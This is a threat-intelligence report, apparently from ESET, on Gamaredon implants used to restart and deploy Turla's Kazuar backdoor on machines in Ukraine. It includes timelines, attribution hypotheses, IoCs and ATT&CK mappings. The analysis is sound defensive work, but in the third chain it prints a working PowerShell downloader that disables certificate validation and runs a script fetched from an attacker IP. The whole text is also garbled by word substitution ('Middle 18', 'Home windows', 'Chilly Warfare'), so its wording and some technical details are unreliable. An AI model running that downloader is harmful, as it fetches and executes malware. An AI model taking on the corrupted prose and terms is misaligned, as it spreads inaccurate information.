On this blogpost, we uncover the primary recognized circumstances of collaboration between Gamaredon and Turla, in Ukraine.
Key factors of this blogpost:
- In February 2025, we found that the Gamaredon device PteroGraphin was used to restart Turla’s Kazuar backdoor on a machine in Ukraine.
- In April and June 2025, we detected that Kazuar v2 was deployed utilizing Gamaredon instruments PteroOdd and PteroPaste.
- These discoveries lead us to imagine with excessive confidence that Gamaredon is collaborating with Turla.
- Turla’s sufferer rely could be very low in comparison with the variety of Gamaredon compromises, suggesting that Turla select probably the most useful machines.
- Each teams are affiliated with the FSB, Russia’s essential home intelligence and safety company.
Menace actor profiles
Gamaredon
Gamaredon has been energetic since not less than 2013. It’s accountable for many assaults, principally towards Ukrainian governmental establishments, as evidenced over time in a number of experiences from CERT-UA and from different official Ukrainian our bodies. Gamaredon has been attributed by the Safety Service of Ukraine (SSU) to the Middle 18 of Data Safety of the FSB, working out of occupied Crimea. We imagine this group to be collaborating with one other risk actor that we found and named InvisiMole.
Turla
Turla, also referred to as Snake, is an notorious cyberespionage group that has been energetic since not less than 2004, probably extending again into the late Nineties. It’s considered a part of the FSB. It primarily focuses on high-profile targets, reminiscent of governments and diplomatic entities, in Europe, Central Asia, and the Center East. It’s recognized for having breached main organizations such because the US Division of Protection in 2008 and the Swiss protection firm RUAG in 2014. Through the previous few years, we have documented a giant half of Turla’s arsenal on the WeLiveSecurity weblog and in non-public experiences.
Overview
In February 2025, through ESET telemetry, we detected 4 totally different Gamaredon-Turla co-compromises in Ukraine. On these machines, Gamaredon deployed a variety of instruments, together with PteroLNK, PteroStew, PteroOdd, PteroEffigy, and PteroGraphin, whereas Turla solely deployed Kazuar v3.
On a kind of machines, we had been capable of seize a payload displaying that Turla is ready to difficulty instructions through Gamaredon implants. PteroGraphin was used to restart Kazuar, probably after Kazuar crashed or was not launched mechanically. Thus, PteroGraphin was in all probability used as a restoration technique by Turla. That is the primary time that we’ve got been capable of hyperlink these two teams collectively through technical indicators (see First chain: Restart of Kazuar v3).
As a result of, in all 4 circumstances, the ESET endpoint product was put in after the compromises we’re unable to pinpoint the precise compromise technique. Nevertheless, Gamaredon is thought for utilizing spearphishing and malicious LNK recordsdata on detachable drives (as defined in our current blogpost) so we presume that considered one of these is the almost certainly compromise vector.
In April and June 2025, we detected Kazuar v2 installers being deployed immediately by Gamaredon instruments (see Second chain: Deployment of Kazuar v2 through PteroOdd and Third chain: Deployment of Kazuar v2 through PteroPaste). This exhibits that Turla is actively collaborating with Gamaredon to achieve entry to particular machines in Ukraine.
Victimology
Over the previous 18 months we’ve got detected Turla on seven machines in Ukraine. We imagine that Gamaredon compromised the primary 4 machines in January 2025, whereas Turla deployed Kazuar v3 in February 2025. In all circumstances, the ESET endpoint product was solely put in after each compromises.
It’s price noting that, previous to this, the final time we detected a Turla compromise in Ukraine was in February 2024.
All these components, and the truth that Gamaredon is compromising lots of if not 1000’s of machines, recommend that Turla is solely in particular machines, in all probability ones containing extremely delicate intelligence.
Attribution
Gamaredon
In these compromises, we detected PteroLNK, PteroStew, and PteroGraphin, which we imagine are unique to Gamaredon.
Turla
Equally, for Turla, we detected using Kazuar v2 and Kazuar v3, which we imagine are unique to that group.
Gamaredon-Turla collaboration hypotheses
In 2020, we confirmed that Gamaredon supplied entry to InvisiMole (see our white paper), so it’s not the primary time that Gamaredon has collaborated with one other Russia-aligned risk actor.
Alternatively, Turla is thought for hijacking different risk actors’ infrastructure to get an preliminary foothold in its targets’ networks. Over the previous years, a number of circumstances have been publicly documented:
- In 2019, Symantec revealed a blogpost displaying that Turla hijacked OilRig (an Iran-aligned group) infrastructure to spy on a Center Japanese goal.
- In 2023, Mandiant revealed a blogpost displaying that Turla reregistered expired Andromeda C&C domains as a way to compromise targets in Ukraine.
- In 2024, Microsoft revealed two blogposts (first and second) displaying that Turla hijacked the cybercrime botnet Amadey and infrastructure of the cyberespionage group SideCopy (a Pakistan-aligned group) as a way to deploy Kazuar.
Be aware that each Gamaredon and Turla are a part of the Russian Federal Safety Service (FSB). Gamaredon is considered operated by officers of Middle 18 of the FSB (aka the Middle for Data Safety) in Crimea (see this report from the Safety Service of Ukraine), which is a part of the FSB’s counterintelligence service. As for Turla, the UK’s NCSC attributes the group to the Middle 16 of the FSB, which is Russia’s essential indicators intelligence (SIGINT) company.
Due to this fact, we suggest three hypotheses to elucidate our observations:
- Very seemingly: On condition that each teams are a part of the Russian FSB (although in two totally different Facilities), Gamaredon supplied entry to Turla operators in order that they may difficulty instructions on a particular machine to restart Kazuar, and deploy Kazuar v2 on some others.
- Unlikely: Turla compromised Gamaredon infrastructure and leveraged this entry to get better entry on a machine in Ukraine. Since PteroGraphin incorporates a hardcoded token that permits modifying the C&C pages, this risk can’t be totally discarded. Nevertheless, it implies that Turla was capable of reproduce the total Gamaredon chain.
- Unlikely: Gamaredon has entry to Kazuar and deploys it on very particular machines. Given Gamaredon’s noisy strategy, we don’t assume it will be that cautious deploying Kazuar on solely a really restricted set of victims.
Geopolitical context
From an organizational perspective, it’s price noting that the 2 entities generally related to Turla and Gamaredon have a protracted historical past of reported collaboration, which will be traced again to the Chilly Warfare period.
The FSB’s Middle 16 (which is believed to harbor Turla) is a direct inheritor to the KGB’s 16th Directorate, which was primarily accountable for international SIGINT assortment – the persistence of the quantity 16 is in reality regarded by observers as an indication of the FSB management’s want to emphasise a historic lineage. Middle 18 (which is mostly related to Gamaredon) maintains a tough affiliation with the KGB’s 2nd Chief Directorate, which was accountable for inner safety inside the Soviet Union. Through the Soviet period, each organizations incessantly labored hand in hand, sharing duties for monitoring international embassies on Russian soil as an example.
Then and now, such collaborations replicate the Russian strategic tradition and philosophy of a pure continuity between inner safety and nationwide protection. Though Middle 16 continues to be tasked with international intelligence assortment and Middle 18 is theoretically a part of the FSB’s counterintelligence equipment, each entities appear to take care of some mission overlaps – particularly with regard to former Soviet republics. In 2018, the Safety Service of Ukraine (SBU) had already noticed Facilities 16 and 18 apparently conducting a joint cyberespionage marketing campaign (named SpiceyHoney). The 2022 full-scale invasion of Ukraine has in all probability strengthened this convergence, with ESET information clearly displaying Gamaredon and Turla actions specializing in the Ukrainian protection sector in current months.
Though the Russian intelligence group is thought for its fierce inner rivalries, there are indications that such tensions mainly apply to interservice relations quite than to intra-agency interactions. On this context, it’s maybe not fully shocking that APT teams working inside these two FSB Facilities are noticed cooperating to some extent.
First chain: Restart of Kazuar v3
In February 2025, we detected the execution of Kazuar by PteroGraphin and PteroOdd on a machine in Ukraine. On this part we element the precise chain that we detected.
Timeline
The general timeline for this machine is the next:
- 2025-01-20: Gamaredon deployed PteroGraphin on the machine. Be aware that the date is from the file creation timestamp supplied by Home windows, which might have been tampered with.
- 2025-02-11: Turla deployed Kazuar v3 on the machine. Be aware that the date is from the file creation timestamp supplied by Home windows, which might have been tampered with.
- 2025-02-27 15:47:39 UTC: PteroGraphin downloaded PteroOdd.
- 2025-02-27 15:47:56 UTC: PteroOdd downloaded a payload, which executed Kazuar.
- 2025-02-28 15:17:14 UTC: PteroOdd downloaded one other payload, which additionally executed Kazuar.
Hereafter, we assume these dates to be unaltered.
Particulars of the occasions
Since January 20th, 2025, PteroGraphin (see Determine 1) was current on the machine at %APPDATApercentx86.ps1. It’s a downloader that gives an encrypted channel for delivering payloads through Telegra.ph, an online service operated by Telegram that permits straightforward creation of internet pages. Be aware that PteroGraphin incorporates a token to edit the Telegra.ph web page, so anybody with information of this token (Turla, for instance, although unlikely) might manipulate the contents.
On February 27th, 2025, at 15:47:39 UTC, as proven in Determine 2, we detected a reply from https://api.telegra[.]ph/getPage/SecurityHealthSystray-01-20?return_content=true.
The information in youngsters will be decrypted utilizing the hardcoded 3DES key and IV from the PteroGraphin script above, which supplies:
powershell -windowStyle hidden -EncodedCommand
The decoded payload is one other PowerShell downloader that we named PteroOdd, proven in Determine 3.
On February 27th, 2025 at 15:47:56 UTC, we detected a request to https://api.telegra[.]ph/getPage/dinoasjdnl-02-27?return_content=true; the reply is proven in Determine 4. Be aware that the replies for PteroOdd aren’t encrypted.
The decoded command is proven in Determine 5.
The payload first uploads the sufferer’s pc identify and system drive’s quantity serial quantity to the Cloudflare employee subdomain https://lucky-king-96d6.mopig92456.employees[.]dev.
What’s most fascinating is the final line:
Begin-Course of -FilePath “C:Customers[redacted]AppDataLocalProgramsSonyAudioDriversvncutil64.exe”
That is the trail to the appliance that’s run to execute Kazuar by side-loading it. The ESET endpoint product detected a KERNEL Kazuar v3 payload (agent_label is AGN-RR-01) in reminiscence and loaded from this course of. It’s not clear to us why Turla operators had to make use of PteroGraphin to launch Kazuar, however it’s potential that Kazuar by some means stopped working after the ESET product set up and that they needed to restart the implant. Be aware that we didn’t see Gamaredon downloading Kazuar; it was current on the system since February 11th, 2025, earlier than the ESET product was put in.
Then, on February 28th, 2025 at 15:17:14 UTC, we detected one other comparable PowerShell script, proven in Determine 6.
The primary strains and the Cloudflare employee subdomain are equivalent. It begins the identical vncutil64.exe but additionally a second executable, LaunchGFExperience.exe, which side-loads LaunchGFExperienceLOC.dll – the Kazuar loader. We then detected in reminiscence, within the LaunchGFExperience.exe course of, one other KERNEL Kazuar v3 payload (agent_label is AGN-XX-01). It’s not clear why two totally different KERNEL Kazuar v3 payloads had been current on the identical machine.
Lastly, an HTTP POST request, with the listing of working processes, was despatched to https://eset.ydns[.]eu/put up.php. The Turla operators almost certainly needed affirmation that Kazuar was efficiently launched.
On March 10th, 2025 at 07:05:32 UTC, we detected one other pattern of PteroOdd, which makes use of the C&C URL https://api.telegra[.]ph/getPage/canposgam-03-06?return_content=true. This pattern was detected on a special machine in Ukraine, on which Kazuar was additionally current.
The decoded payload is proven in Determine 7 and exhibits that it additionally makes use of eset.ydns[.]eu, whereas not interacting with any Turla pattern.
Alternatively, we famous that the downloaded payload uploads the next items of data to https://eset.ydns[.]eu/put up.php:
Nevertheless, we’re not conscious of any .NET device that’s at the moment being utilized by Gamaredon, whereas there are a number of of them utilized by Turla, together with Kazuar. Thus, it’s potential that these uploaded items of data are for Turla, and we assess with medium confidence that the area eset.ydns[.]eu is managed by Turla.
The extra base64-encoded PowerShell command is a brand new downloader that abuses api.gofile[.]io; we named it PteroEffigy.
Kazuar v3
Kazuar v3 is the most recent department of the Kazuar household, itself a sophisticated C# espionage implant that we imagine is used solely by Turla because it was first seen in 2016. Kazuar v2 and v3 are essentially the identical malware household and share the identical codebase. Nevertheless, some main adjustments have been launched.
Kazuar v3 contains round 35% extra C# strains than Kazuar v2 and introduces extra community transport strategies: over internet sockets and Alternate Net Providers. Kazuar v3 can have considered one of three roles (KERNEL, BRIDGE, or WORKER), and malware functionalities are divided amongst these roles. For instance, solely BRIDGE communicates with the C&C server.
Second chain: Deployment of Kazuar v2 through PteroOdd
On one of many Ukrainian machines talked about within the earlier part, we detected one other fascinating compromise chain on April 18th, 2025.
On April 18th, 2025 at 15:26:14 UTC, we detected a PteroOdd pattern (a Gamaredon device) downloading a payload from https://api.telegra[.]ph/getPage/scrsskjqwlbw-02-28?return_content=true. The downloaded script, proven in Determine 8, is much like the payload described within the first chain, however incorporates an extra base64-encoded script, which is the PowerShell downloader PteroEffigy.
This PowerShell payload downloads one other payload from https://eset.ydns[.]eu/scrss.ps1 and executes it.
scrss.ps1 turned out to be an installer for Turla’s Kazuar v2, which was beforehand analyzed intimately by Unit42. This exhibits that Gamaredon deployed Kazuar, almost certainly on behalf of Turla.
The Kazuar agent_label is AGN-AB-26 and the three C&C servers are:
- https://abrargeospatial[.]ir/wp-includes/fonts/wp-icons/index.php
- https://www.brannenburger-nagelfluh[.]de/wp-includes/style-engine/css/index.php
- https://www.pizzeria-mercy[.]de/wp-includes/photos/media/bar/index.php
It’s price noting that Turla retains utilizing compromised WordPress servers as C&Cs for Kazuar.
Curiously, evidently Kazuar v2 continues to be maintained in parallel to Kazuar v3. For instance, the current updates to the backdoor instructions in Kazuar v3 are additionally included on this AGN-AB-26 model.
Third chain: Deployment of Kazuar v2 through PteroPaste
On June 5th and 6th, 2025, we detected Gamaredon deploying a Turla implant on two machines in Ukraine. In each circumstances, Gamaredon’s PteroPaste was caught attempting to execute the easy PowerShell script proven in Determine 9.
The base64-encoded string is the next downloader in PowerShell:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object Web.WebClient).downloadString(‘https://91.231.182[.]187/ekrn.ps1’);
The downloaded script ekrn.ps1 is similar to scrss.ps1 talked about within the second chain. This additionally drops and installs Kazuar v2.
Each samples have an agent_label of AGN-AB-27 and the C&C servers are the identical as these within the pattern from the second chain:
- https://www.brannenburger-nagelfluh[.]de/wp-includes/style-engine/css/index.php
- https://www.pizzeria-mercy[.]de/wp-includes/photos/media/bar/index.php
- https://abrargeospatial[.]ir/wp-includes/fonts/wp-icons/index.php
ekrn.exe is a authentic technique of ESET endpoint safety merchandise. Thus, Turla in all probability tried to masquerade because it as a way to fly below the radar. Additionally observe that ekrn.ydns[.]eu resolves to 91.231.182[.]187.
Lastly, we additionally discovered on VirusTotal a VBScript variant of the Kazuar v2 PowerShell installer. It was uploaded from Kyrgyzstan on June 5th, 2025. This implies that Turla is concerned about targets outdoors of Ukraine as effectively.
Conclusion
On this blogpost, we’ve got proven how Turla was capable of leverage implants operated by Gamaredon (PteroGraphin, PteroOdd, and PteroPaste) as a way to restart Kazuar v3 and deploy Kazuar v2 on a number of machines in Ukraine. We now imagine with excessive confidence that each teams – individually related to the FSB – are cooperating and that Gamaredon is offering preliminary entry to Turla.
For any inquiries about our analysis revealed on WeLiveSecurity, please contact us at threatintel@eset.com.ESET Analysis provides non-public APT intelligence experiences and information feeds. For any inquiries about this service, go to the ESET Menace Intelligence web page.
IoCs
A complete listing of indicators of compromise (IoCs) and samples will be present in our GitHub repository.
Recordsdata
| SHA-1 | Filename | Detection | Description |
| 7DB790F75829D3E6207D | N/A | PowerShell/Pterodo.QB | PteroOdd. |
| 2610A899FE73B8F018D1 | N/A | PowerShell/Pterodo.QB | PteroOdd. |
| 3A24520566BBE2E262A2 | N/A | PowerShell/Pterodo.QB | PteroOdd. |
| DA7D5B9AB578EF648747 | scrss.ps1 | PowerShell/Turla.AI | Kazuar v2 installer. |
| D7DF1325F66E029F4B77 | N/A | MSIL/Turla.N.gen | Kazuar v2. |
| FF741330CC8D9624D791 | N/A | PowerShell/TrojanDo | PowerShell downloader executed by PteroPaste. |
| A7ACEE41D66B537D9004 | ekrn.ps1 | PowerShell/Turla.AJ | Kazuar v2 installer. |
| 54F2245E0D3ADEC566E4 | N/A | MSIL/Agent_AGen.CZQ | Kazuar v2. |
| 371AB9EB2A3DA44099B2 | ekrn.ps1 | PowerShell/Turla.AJ | Kazuar v2 installer. |
| 4A58365EB8F928EC3CD6 | N/A | MSIL/Turla.W | Kazuar v2. |
| 214DC22FA25314F9C0DD | Sandboxie.vbs | VBS/Turla.C | Kazuar v2 installer – VBScript variant. |
Community
| IP | Area | Internet hosting supplier | First seen | Particulars |
| N/A | lucky-king-96d6.mop | N/A | 2025‑02‑28 | Cloudflare employee present in payloads downloaded by PteroOdd. |
| 64.176.173[.]164 | eset.ydns[.]eu | The Fixed Firm, LLC | 2025‑03‑01 | C&C server present in payloads downloaded by PteroOdd. |
| 85.13.145[.]231 | hauptschule-schw | Neue Medien Muennich GmbH | 2024‑06‑06 | Compromised WordPress web site used as Kazuar C&C. |
| 91.231.182[.]187 | ekrn.ydns[.]eu | South Park Networks LLC | 2025‑06‑05 | C&C server in payloads downloaded by PteroPaste. |
| 185.118.115[.]15 | fjsconsultoria[.]com | Dream Fusion – IT Providers, Lda | 2024‑06‑26 | Compromised WordPress web site used as Kazuar C&C. |
| 77.46.148[.]242 | ingas[.]rs | TELEKOM SRBIJA a.d. | 2024‑06‑03 | Compromised WordPress web site used as Kazuar C&C. |
| 168.119.152[.]19 | abrargeospatial[.]ir | Hetzner On-line GmbH | 2023‑11‑13 | Compromised WordPress web site used as Kazuar C&C. |
| 217.160.0[.]33 | www.brannenburg | IONOS SE | 2019‑06‑06 | Compromised WordPress web site used as Kazuar C&C. |
| 217.160.0[.]159 | www.pizzeria-mercy[.]de | IONOS SE | 2023‑10‑05 | Compromised WordPress web site used as Kazuar C&C. |
MITRE ATT&CK strategies
This desk was constructed utilizing model 17 of the MITRE ATT&CK framework.
| Tactic | ID | Identify | Description |
| Useful resource Growth | T1583.001 | Purchase Infrastructure: Domains | Gamaredon or Turla registered a website at a free dynamic DNS supplier. |
| T1583.004 | Purchase Infrastructure: Server | Gamaredon or Turla rented a server at Vultr. | |
| T1583.007 | Purchase Infrastructure: Serverless | Gamaredon created Cloudflare employees and Telegra.ph pages. | |
| T1584.003 | Compromise Infrastructure: Digital Non-public Server | Turla compromised WordPress web sites. | |
| T1608 | Stage Capabilities | Turla staged Kazuar installer scripts on its C&C servers. | |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | PteroGraphin is developed in PowerShell. |
| Persistence | T1574.002 | Hijack Execution Circulate: DLL Aspect-Loading | Kazuar loaders use DLL side-loading. |
| Protection Evasion | T1140 | Deobfuscate/Decode Recordsdata or Data | The Kazuar payload is XOR encrypted and all Kazuar strings are encrypted through substitution tables. |
| T1480.001 | Execution Guardrails: Environmental Keying | Kazuar loaders decrypt the payloads, utilizing the machine identify as the important thing. | |
| T1036.005 | Masquerading: Match Reputable Identify or Location | Kazuar loaders are positioned in legitimate-looking directories reminiscent of C:Program Recordsdata (x86)Brother PrinterApp or %LOCALAPPDATApercentProgramsSonyAudio | |
| Discovery | T1057 | Course of Discovery | The PowerShell script beginning Kazuar v3 sends the listing of working processes to its C&C server. |
| T1012 | Question Registry | The PowerShell script beginning Kazuar v3 will get the PowerShell model from the registry. | |
| T1082 | System Data Discovery | The PowerShell script beginning Kazuar v3 exfiltrates the final boot time, OS model, and OS structure. | |
| T1083 | File and Listing Discovery | The PowerShell script beginning Kazuar v3 lists recordsdata within the directories %TEMP% and %APPDATApercentMicrosoftWindows. | |
| Command and Management | T1071.001 | Software Layer Protocol: Net Protocols | PteroGraphin and Kazuar use HTTPS. |
| T1573.001 | Encrypted Channel: Symmetric Cryptography | PteroGraphin decrypts the C&C reply utilizing 3DES. | |
| T1102 | Net Service | Reputable internet providers, reminiscent of Telegra.ph, had been used on this marketing campaign. |
